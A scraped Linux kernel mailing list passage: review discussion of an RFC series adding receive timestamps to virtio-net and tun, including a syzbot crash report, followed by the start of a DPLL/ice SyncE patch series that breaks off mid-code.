https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Hi, On 2026-01-29 at 17:48 +08, Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote: oh, you are right, the order should be the other way around. I haven't sent the draft yet, because I'm unsure if I understood the way this should be implemented with the flow filter correctly. If the direction is correct, I'd try and get the specification process going again. (That is not that easy, if you're not used to it and not that deep into the whole virtio universe ;)) Best regards, Steffen -- Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar | Steuerwalder Str. 21 | https://www.pengutronix.de/ | 31137 Hildesheim, Germany | Phone: +49-5121-206917-0 | Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 11:08:27 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On Thu, 29 Jan 2026 11:08:27 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote: There have been many historical attempts in this area- you may want to take a look first. Thanks.
{ "author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>", "date": "Thu, 29 Jan 2026 19:03:15 +0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
syzbot ci has tested the following series [v2] virtio-net: add flow filter for receive timestamps https://lore.kernel.org/all/20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de * [PATCH RFC v2 1/2] tun: support rx-tstamp * [PATCH RFC v2 2/2] virtio-net: support receive timestamp and found the following issue: WARNING in __copy_overflow Full report is available here: https://ci.syzbot.org/series/0b35c8c9-603b-4126-ac04-0095faadb2f5 *** WARNING in __copy_overflow tree: net-next URL: https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git base: ffeafa65b2b26df2f5b5a6118d3174f17bd12ec5 arch: amd64 compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8 config: https://ci.syzbot.org/builds/d8316da2-2688-4d74-bbf4-e8412e24d106/config C repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/c_repro syz repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/syz_repro ------------[ cut here ]------------ Buffer overflow detected (32 < 1840)! WARNING: mm/maccess.c:234 at __copy_overflow+0x17/0x30 mm/maccess.c:234, CPU#0: syz.0.17/5993 Modules linked in: CPU: 0 UID: 0 PID: 5993 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:__copy_overflow+0x1c/0x30 mm/maccess.c:234 Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 53 48 89 f3 89 fd e8 60 b1 c4 ff 48 8d 3d 39 25 d5 0d 89 ee 48 89 da <67> 48 0f b9 3a 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 90 90 RSP: 0018:ffffc90003b97888 EFLAGS: 00010293 RAX: ffffffff81fdcf50 RBX: 0000000000000730 RCX: ffff88810ccd9d40 RDX: 0000000000000730 RSI: 0000000000000020 RDI: ffffffff8fd2f490 RBP: 0000000000000020 R08: ffffffff8fcec777 R09: 1ffffffff1f9d8ee R10: dffffc0000000000 R11: ffffffff81742230 R12: dffffc0000000000 R13: 0000000000000000 R14: 0000000000000730 R15: 1ffff92000772f30 FS: 00007f08c446a6c0(0000) GS:ffff88818e32d000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f08c4448ff8 CR3: 000000010cec2000 CR4: 00000000000006f0 Call Trace: <TASK> copy_overflow include/linux/ucopysize.h:41 [inline] check_copy_size include/linux/ucopysize.h:50 [inline] copy_to_iter include/linux/uio.h:219 [inline] tun_put_user drivers/net/tun.c:2089 [inline] tun_do_read+0x1f44/0x28a0 drivers/net/tun.c:2190 tun_chr_read_iter+0x13b/0x260 drivers/net/tun.c:2214 do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1 vfs_readv+0x288/0x840 fs/read_write.c:1018 do_readv+0x154/0x2e0 fs/read_write.c:1080 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f08c359acb9 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f08c446a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000013 RAX: ffffffffffffffda RBX: 00007f08c3815fa0 RCX: 00007f08c359acb9 RDX: 0000000000000002 RSI: 0000200000000080 RDI: 0000000000000003 RBP: 00007f08c3608bf7 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f08c3816038 R14: 00007f08c3815fa0 R15: 00007fff6491da78 </TASK> ---------------- Code disassembly (best guess): 0: 90 nop 1: 90 nop 2: 90 nop 3: 90 nop 4: 90 nop 5: 90 nop 6: 90 nop 7: 90 nop 8: 90 nop 9: 90 nop a: 90 nop b: 90 nop c: 90 nop d: 90 nop e: f3 0f 1e fa endbr64 12: 55 push %rbp 13: 53 push %rbx 14: 48 89 f3 mov %rsi,%rbx 17: 89 fd mov %edi,%ebp 19: e8 60 b1 c4 ff call 0xffc4b17e 1e: 48 8d 3d 39 25 d5 0d lea 0xdd52539(%rip),%rdi # 0xdd5255e 25: 89 ee mov %ebp,%esi 27: 48 89 da mov %rbx,%rdx * 2a: 67 48 0f b9 3a ud1 (%edx),%rdi <-- trapping instruction 2f: 5b pop %rbx 30: 5d pop %rbp 31: c3 ret 32: cc int3 33: cc int3 34: cc int3 35: cc int3 36: cc int3 37: cc int3 38: cc int3 39: cc int3 3a: cc int3 3b: cc int3 3c: cc int3 3d: cc int3 3e: 90 nop 3f: 90 nop *** If these findings have caused you to resend the series or submit a separate fix, please add the following tag to your commit message: Tested-by: syzbot@syzkaller.appspotmail.com --- This report is generated by a bot. It may contain errors. syzbot ci engineers can be reached at syzkaller@googlegroups.com.
{ "author": "syzbot ci <syzbot+ci99a227ab2089b0fa@syzkaller.appspotmail.com>", "date": "Thu, 29 Jan 2026 05:27:03 -0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Steffen Trumtrar wrote: Good to see this picked up. I would also still like to see support in virtio-net for HW timestamps pass-through for virtio-net.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:07 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Steffen Trumtrar wrote: This patch refers to a struct that does not exist yet, so this cannot compile?
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:49 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Steffen Trumtrar wrote: Jason, Michael: creating a new struct for every field is not very elegant. Is it time to find a more forward looking approach to expanding with new fields? Like a TLV, or how netlink structs like tcp_info are extended with support for legacy users that only use a truncated struct? It's fine to implement filters, but also fine to only support ALL or NONE for simplicity. In the end it probably depends on what the underlying physical device supports. Why the multiple fields, rather than u64. More broadly: can my old patchset be dusted off as is. Does it require significant changes? I only paused it at the time, because I did not have a real device back-end that was going to support it.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:05:54 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On 2026-02-01 at 16:05 -05, Willem de Bruijn <willemdebruijn.kernel@gmail.com> wrote: Yes, this gets complicated real fast and leads to really long calls for all the nested fields. If there is a different way, I'd prefer that. Should have added a comment, but this is based on this patch c3838262b824c71c145cd3668722e99a69bc9cd9 virtio_net: fix alignment for virtio_net_hdr_v1_hash Changing alignment of header would mean it's no longer safe to cast a 2 byte aligned pointer between formats. Use two 16 bit fields to make it 2 byte aligned as previously. This is the dusted off version ;) With the flow filter it should be possible to turn the timestamps on and off during runtime. Best regards, Steffen -- Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar | Steuerwalder Str. 21 | https://www.pengutronix.de/ | 31137 Hildesheim, Germany | Phone: +49-5121-206917-0 | Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Mon, 02 Feb 2026 08:34:58 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On Sun, Feb 01, 2026 at 04:05:54PM -0500, Willem de Bruijn wrote: I certainly wouldn't mind, though I suspect tlv is too complex as hardware implementations can't efficiently follow linked lists. I'll try to ping some hardware designers for what works well for offloads.
{ "author": "\"Michael S. Tsirkin\" <mst@redhat.com>", "date": "Mon, 2 Feb 2026 02:59:31 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Michael S. Tsirkin wrote: Great thanks. Agreed that TLV was probably the wrong suggestion. We can definitely have a required order of fields. My initial thought is as said like many user/kernel structures: where both sides agree on the basic order of the struct, and pass along the length, so that they agree only to process the min of both their supported lengths. New fields are added at the tail of the struct. See for instance getsockopt TCP_INFO.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Mon, 02 Feb 2026 12:40:36 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Extend the DPLL core to support associating a DPLL pin with a firmware node. This association is required to allow other subsystems (such as network drivers) to locate and request specific DPLL pins defined in the Device Tree or ACPI. * Add a .fwnode field to the struct dpll_pin * Introduce dpll_pin_fwnode_set() helper to allow the provider driver to associate a pin with a fwnode after the pin has been allocated * Introduce fwnode_dpll_pin_find() helper to allow consumers to search for a registered DPLL pin using its associated fwnode handle * Ensure the fwnode reference is properly released in dpll_pin_put() Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * fixed fwnode_dpll_pin_find() return value description --- drivers/dpll/dpll_core.c | 49 ++++++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 2 ++ include/linux/dpll.h | 11 +++++++++ 3 files changed, 62 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 8879a72351561..f04ed7195cadd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -595,12 +596,60 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->parent_refs); xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); +/** + * dpll_pin_fwnode_set - set dpll pin firmware node reference + * @pin: pointer to a dpll pin + * @fwnode: firmware node handle + * + * Set firmware node handle for the given dpll pin. + */ +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode) +{ + mutex_lock(&dpll_lock); + fwnode_handle_put(pin->fwnode); /* Drop fwnode previously set */ + pin->fwnode = fwnode_handle_get(fwnode); + mutex_unlock(&dpll_lock); +} +EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); + +/** + * fwnode_dpll_pin_find - find dpll pin by firmware node reference + * @fwnode: reference to firmware node + * + * Get existing object of a pin that is associated with given firmware node + * reference. + * + * Context: Acquires a lock (dpll_lock) + * Return: + * * valid dpll_pin pointer on success + * * NULL when no such pin exists + */ +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + struct dpll_pin *pin, *ret = NULL; + unsigned long index; + + mutex_lock(&dpll_lock); + xa_for_each(&dpll_pin_xa, index, pin) { + if 